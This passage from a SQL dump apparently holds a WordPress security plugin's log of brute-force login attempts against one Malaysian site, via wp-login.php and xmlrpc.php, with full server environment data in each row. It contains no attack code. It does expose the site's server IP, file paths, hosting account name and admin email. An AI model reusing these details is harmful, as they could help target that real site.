16:06:20',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.75.27'),(24630,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.72.117\";s:11:\"REMOTE_PORT\";s:5:\"54730\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEGAEViJhUiKk@yAoey8gAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736769.0205\";s:12:\"REQUEST_TIME\";s:10:\"1568736769\";}}','notice','2019-09-17 16:12:50','2019-09-17 16:12:49',17740208,19231120,'https://bintara.com.my/wp-login.php',1,0,'178.128.72.117'),(24631,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.72.117\";s:11:\"REMOTE_PORT\";s:5:\"55624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEGBUViJhUiKk@yAoey@wAAAZE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568736773.5227\";s:12:\"REQUEST_TIME\";s:10:\"1568736773\";}}','notice','2019-09-17 16:12:55','2019-09-17 16:12:53',18257344,19556920,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.72.117'),(24632,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"50208\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEHWEViJhUiKk@yAoe0dwAAAYA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737112.4001\";s:12:\"REQUEST_TIME\";s:10:\"1568737112\";}}','notice','2019-09-17 16:18:33','2019-09-17 16:18:32',17740776,19233112,'https://bintara.com.my/wp-login.php',1,0,'167.114.118.135'),(24633,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"52110\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEHW0ViJhUiKk@yAoe0hAAAAYI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737115.5459\";s:12:\"REQUEST_TIME\";s:10:\"1568737115\";}}','notice','2019-09-17 16:18:36','2019-09-17 16:18:35',18258456,19555792,'https://bintara.com.my/xmlrpc.php',1,0,'167.114.118.135'),(24634,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.53.12.11\";s:11:\"REMOTE_PORT\";s:5:\"39642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEIxEViJhUiKk@yAoe1@QAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737476.2895\";s:12:\"REQUEST_TIME\";s:10:\"1568737476\";}}','notice','2019-09-17 16:24:37','2019-09-17 16:24:36',17740288,19230352,'https://bintara.com.my/wp-login.php',1,0,'176.53.12.11'),(24635,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.53.12.11\";s:11:\"REMOTE_PORT\";s:5:\"40530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEIx-gg4cIpXyxKa542ZQAAAFY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737479.2307\";s:12:\"REQUEST_TIME\";s:10:\"1568737479\";}}','notice','2019-09-17 16:24:40','2019-09-17 16:24:39',18259024,19558312,'https://bintara.com.my/xmlrpc.php',1,0,'176.53.12.11'),(24636,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"50664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEJ@kViJhUiKk@yAoe37wAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737786.8285\";s:12:\"REQUEST_TIME\";s:10:\"1568737786\";}}','notice','2019-09-17 16:29:48','2019-09-17 16:29:47',17740248,19230648,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24637,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"51080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEJ-UViJhUiKk@yAoe39QAAAZY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737789.9958\";s:12:\"REQUEST_TIME\";s:10:\"1568737789\";}}','notice','2019-09-17 16:29:51','2019-09-17 16:29:50',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24638,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.247.54.2\";s:11:\"REMOTE_PORT\";s:5:\"58664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEKEEViJhUiKk@yAoe4HAAAAZg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568737808.2185\";s:12:\"REQUEST_TIME\";s:10:\"1568737808\";}}','notice','2019-09-17 16:30:09','2019-09-17 